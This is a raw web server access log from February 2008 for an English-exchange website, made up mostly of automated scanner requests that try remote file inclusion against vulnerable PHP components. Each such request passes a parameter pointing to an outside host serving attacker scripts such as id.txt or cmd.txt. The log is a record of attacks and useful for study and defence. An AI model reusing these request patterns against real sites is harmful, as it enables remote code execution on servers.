64.13.229.88 - - [24/Feb/2008:05:32:23 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cartographia.org/ftp/files/source/TaN? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
64.13.229.88 - - [24/Feb/2008:05:32:23 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cartographia.org/ftp/files/source/TaN? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
64.13.229.88 - - [24/Feb/2008:05:32:23 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cartographia.org/ftp/files/source/TaN? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
64.13.229.88 - - [24/Feb/2008:05:32:24 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cartographia.org/ftp/files/source/TaN? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
64.13.229.88 - - [24/Feb/2008:05:32:45 -0800] "GET /logs/%3Cwbr%20/%3Eaccess_071203.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cartographia.org/ftp/files/source/TaN? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
64.13.229.88 - - [24/Feb/2008:05:32:46 -0800] "GET /logs/%3Cwbr%20/%3Eaccess_071203.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cartographia.org/ftp/files/source/TaN? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
216.138.195.10 - - [24/Feb/2008:05:32:57 -0800] "GET /logs/access_071022.log/help.php?id=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
216.138.195.10 - - [24/Feb/2008:05:32:59 -0800] "GET /help.php?id=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
216.138.195.10 - - [24/Feb/2008:05:33:01 -0800] "GET /logs/help.php?id=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
64.13.229.88 - - [24/Feb/2008:05:33:15 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cartographia.org/ftp/files/source/TaN? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
64.13.229.88 - - [24/Feb/2008:05:33:15 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cartographia.org/ftp/files/source/TaN? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
216.138.195.10 - - [24/Feb/2008:05:33:49 -0800] "GET /logs/access_071022.log/help.php?id=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
216.138.195.10 - - [24/Feb/2008:05:33:51 -0800] "GET /help.php?id=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
216.138.195.10 - - [24/Feb/2008:05:33:53 -0800] "GET /logs/help.php?id=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
216.138.195.10 - - [24/Feb/2008:05:34:34 -0800] "GET /logs/access_071022.log/help.php?id=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
216.138.195.10 - - [24/Feb/2008:05:34:36 -0800] "GET /help.php?id=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
216.138.195.10 - - [24/Feb/2008:05:34:38 -0800] "GET /logs/help.php?id=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
69.144.55.219 - - [24/Feb/2008:05:35:21 -0800] "GET /logs/access_080114.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
69.144.55.219 - - [24/Feb/2008:05:35:21 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
69.144.55.219 - - [24/Feb/2008:05:35:22 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
200.111.157.66 - - [24/Feb/2008:05:35:41 -0800] "GET /logs/%3Cwbr%20/%3Eaccess_080127.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
200.111.157.66 - - [24/Feb/2008:05:35:42 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
200.111.157.66 - - [24/Feb/2008:05:35:43 -0800] "GET /logs/%3Cwbr%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
64.13.229.88 - - [24/Feb/2008:05:35:47 -0800] "GET /logs/access_071203.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cartographia.org/ftp/files/source/TaN? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
64.13.229.88 - - [24/Feb/2008:05:35:50 -0800] "GET /logs/access_071203.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cartographia.org/ftp/files/source/TaN? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
66.135.33.135 - - [24/Feb/2008:05:36:40 -0800] "GET /logs/access_071210.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
200.111.157.66 - - [24/Feb/2008:05:38:00 -0800] "GET /logs/%3Cwbr%20/%3Eaccess.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
207.87.60.4 - - [24/Feb/2008:05:39:57 -0800] "GET /logs/access_080114.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.zuuniimedee.mn//modules/My_eGallery/data/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
207.87.60.4 - - [24/Feb/2008:05:39:57 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.zuuniimedee.mn//modules/My_eGallery/data/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
207.87.60.4 - - [24/Feb/2008:05:39:57 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.zuuniimedee.mn//modules/My_eGallery/data/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
72.30.226.157 - - [24/Feb/2008:05:40:17 -0800] "GET /logs/access_071224.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
89.111.176.57 - - [24/Feb/2008:05:40:31 -0800] "GET /logs/access_071126.log/index.php3?s=http://scanbax.we.bs/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
216.138.195.10 - - [24/Feb/2008:05:40:33 -0800] "GET /logs/access_071119.log/help.php?id=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
216.138.195.10 - - [24/Feb/2008:05:40:40 -0800] "GET /logs/access_071119.log/help.php?id=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
205.212.166.193 - - [24/Feb/2008:05:40:55 -0800] "GET /logs/access_080114.log//index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
205.212.166.193 - - [24/Feb/2008:05:40:55 -0800] "GET //index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
205.212.166.193 - - [24/Feb/2008:05:40:55 -0800] "GET /logs//index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
82.160.11.72 - - [24/Feb/2008:05:41:07 -0800] "GET ///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
82.160.11.72 - - [24/Feb/2008:05:41:26 -0800] "GET ///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
218.188.2.141 - - [24/Feb/2008:05:41:42 -0800] "GET /logs/access_080107.log/modules/My_eGallery/index.php?basepath=http://www.avisosgratis.com.ar/data/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
72.30.216.91 - - [24/Feb/2008:05:42:09 -0800] "GET /logs/access_071217.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
211.233.19.105 - - [24/Feb/2008:05:42:13 -0800] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.toulouseangloexchange.com"
211.233.19.105 - - [24/Feb/2008:05:42:13 -0800] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.toulouseangloexchange.com"
69.144.55.219 - - [24/Feb/2008:05:42:30 -0800] "GET /logs/access_071210.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
205.212.166.193 - - [24/Feb/2008:05:42:45 -0800] "GET /logs/access_071126.log//index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
216.138.195.10 - - [24/Feb/2008:05:43:02 -0800] "GET /logs/access_071119.log/help.php?id=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
211.233.19.105 - - [24/Feb/2008:05:43:29 -0800] "GET /logs/access_080107.log//tools/send_reminders.php?noSet=0&includedir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
211.233.19.105 - - [24/Feb/2008:05:43:29 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
211.233.19.105 - - [24/Feb/2008:05:43:30 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
201.31.30.226 - - [24/Feb/2008:05:43:52 -0800] "GET /logs/access_080114.log//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.koreandentists.org/bbs//data1/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
201.31.30.226 - - [24/Feb/2008:05:43:53 -0800] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.koreandentists.org/bbs//data1/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
82.160.11.72 - - [24/Feb/2008:05:44:29 -0800] "GET /logs/access_080121.log///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
82.160.11.72 - - [24/Feb/2008:05:44:29 -0800] "GET ///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
67.195.58.186 - - [24/Feb/2008:05:44:45 -0800] "GET / HTTP/1.0" 200 903 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
82.160.11.72 - - [24/Feb/2008:05:44:47 -0800] "GET /logs/access_071224.log///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
82.160.11.72 - - [24/Feb/2008:05:44:47 -0800] "GET /logs/access_080121.log///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
82.160.11.72 - - [24/Feb/2008:05:44:51 -0800] "GET /logs///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
82.160.11.72 - - [24/Feb/2008:05:46:01 -0800] "GET /logs/access_071224.log///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
211.233.19.105 - - [24/Feb/2008:05:49:48 -0800] "GET /logs/access_071231.log//tools/send_reminders.php?noSet=0&includedir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
81.89.137.99 - - [24/Feb/2008:05:50:30 -0800] "GET /logs/index.php3?s=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
81.89.137.99 - - [24/Feb/2008:05:50:31 -0800] "GET /index.php3?s=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
81.89.137.99 - - [24/Feb/2008:05:50:55 -0800] "GET /logs/index.php3?s=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
81.89.137.99 - - [24/Feb/2008:05:50:56 -0800] "GET /logs/index.php3?s=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
81.89.137.99 - - [24/Feb/2008:05:50:56 -0800] "GET /index.php3?s=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
81.89.137.99 - - [24/Feb/2008:05:50:56 -0800] "GET /index.php3?s=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
201.35.66.58 - - [24/Feb/2008:05:52:35 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
205.212.166.193 - - [24/Feb/2008:05:54:34 -0800] "GET /logs/access_071231.log//index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
208.79.234.84 - - [24/Feb/2008:05:56:18 -0800] "GET /logs/access_080114.log//faqsupport/samplefaqsupport.php?path[docroot]=http://h1.ripway.com/alat/cmd? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
208.79.234.84 - - [24/Feb/2008:05:56:18 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://h1.ripway.com/alat/cmd? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
208.79.234.84 - - [24/Feb/2008:05:56:18 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://h1.ripway.com/alat/cmd? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.34.176.201 - - [24/Feb/2008:05:56:58 -0800] "GET /lib/base.php?BaseCfg[BaseDir]=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.toulouseangloexchange.com"
64.34.176.201 - - [24/Feb/2008:05:56:58 -0800] "GET /logs/lib/base.php?BaseCfg[BaseDir]=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.toulouseangloexchange.com"
205.212.166.193 - - [24/Feb/2008:05:57:10 -0800] "GET /logs/access_080127.log//index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
65.98.25.34 - - [24/Feb/2008:05:57:35 -0800] "GET /logs/access_080211.log//components/com_jd-wiki/bin/dwpage.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
65.98.25.34 - - [24/Feb/2008:05:57:37 -0800] "GET //components/com_jd-wiki/bin/dwpage.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
65.98.25.34 - - [24/Feb/2008:05:57:38 -0800] "GET /logs//components/com_jd-wiki/bin/dwpage.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
65.98.25.34 - - [24/Feb/2008:05:58:24 -0800] "GET /logs/access_080211.log//components/com_jd-wiki/bin/dwpage.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
65.98.25.34 - - [24/Feb/2008:05:58:25 -0800] "GET //components/com_jd-wiki/bin/dwpage.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
65.98.25.34 - - [24/Feb/2008:05:58:27 -0800] "GET /logs//components/com_jd-wiki/bin/dwpage.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
195.56.111.194 - - [24/Feb/2008:05:59:53 -0800] "GET /logs/access_071231.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
195.56.111.194 - - [24/Feb/2008:05:59:53 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
195.56.111.194 - - [24/Feb/2008:05:59:53 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
208.79.234.84 - - [24/Feb/2008:06:01:23 -0800] "GET /logs/access_071210.log//faqsupport/samplefaqsupport.php?path[docroot]=http://h1.ripway.com/alat/cmd? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
124.161.97.124 - - [24/Feb/2008:06:03:09 -0800] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.koreandentists.org/bbs//data1/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
217.197.68.66 - - [24/Feb/2008:06:04:54 -0800] "GET /logs/access_071231.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
217.197.68.66 - - [24/Feb/2008:06:04:54 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
217.197.68.66 - - [24/Feb/2008:06:04:55 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
66.230.197.170 - - [24/Feb/2008:06:08:26 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.fgo.at/tmp/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
67.195.58.169 - - [24/Feb/2008:06:16:59 -0800] "GET /logs/access_071231.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
217.17.29.41 - - [24/Feb/2008:06:18:01 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.clanwac.co.uk/tmp/.../.../cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.toulouseangloexchange.com"
217.17.29.41 - - [24/Feb/2008:06:18:01 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.clanwac.co.uk/tmp/.../.../cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.toulouseangloexchange.com"
216.138.195.10 - - [24/Feb/2008:06:18:13 -0800] "GET /logs/access_080114.log//index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
216.138.195.10 - - [24/Feb/2008:06:18:14 -0800] "GET //index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
216.138.195.10 - - [24/Feb/2008:06:18:14 -0800] "GET /logs//index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
124.217.247.166 - - [24/Feb/2008:06:18:23 -0800] "GET /logs/access_071231.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
124.217.247.166 - - [24/Feb/2008:06:18:24 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
124.217.247.166 - - [24/Feb/2008:06:18:25 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
66.230.197.170 - - [24/Feb/2008:06:18:38 -0800] "GET /logs/access_071210.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.fgo.at/tmp/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.230.197.170 - - [24/Feb/2008:06:18:38 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.fgo.at/tmp/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
61.250.95.201 - - [24/Feb/2008:06:19:22 -0800] "GET /logs/access_080107.log//redaxo/include/addons/image_resize/pages/index.inc.php?REX[INCLUDE_PATH]=http://yugifire.t35.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
61.250.95.201 - - [24/Feb/2008:06:19:23 -0800] "GET //redaxo/include/addons/image_resize/pages/index.inc.php?REX[INCLUDE_PATH]=http://yugifire.t35.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
61.250.95.201 - - [24/Feb/2008:06:19:24 -0800] "GET /logs//redaxo/include/addons/image_resize/pages/index.inc.php?REX[INCLUDE_PATH]=http://yugifire.t35.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
216.138.195.10 - - [24/Feb/2008:06:20:04 -0800] "GET /logs/access_080114.log//index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
216.138.195.10 - - [24/Feb/2008:06:20:04 -0800] "GET //index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
216.138.195.10 - - [24/Feb/2008:06:20:04 -0800] "GET /logs//index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
216.138.195.10 - - [24/Feb/2008:06:21:15 -0800] "GET /logs/access_080114.log//index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
216.138.195.10 - - [24/Feb/2008:06:21:17 -0800] "GET //index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
216.138.195.10 - - [24/Feb/2008:06:21:18 -0800] "GET /logs//index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
66.230.197.170 - - [24/Feb/2008:06:21:24 -0800] "GET /logs/access_071022.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.fgo.at/tmp/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.138.195.10 - - [24/Feb/2008:06:21:27 -0800] "GET /logs/access_071126.log//index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
216.138.195.10 - - [24/Feb/2008:06:23:21 -0800] "GET /logs/access_071126.log//index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
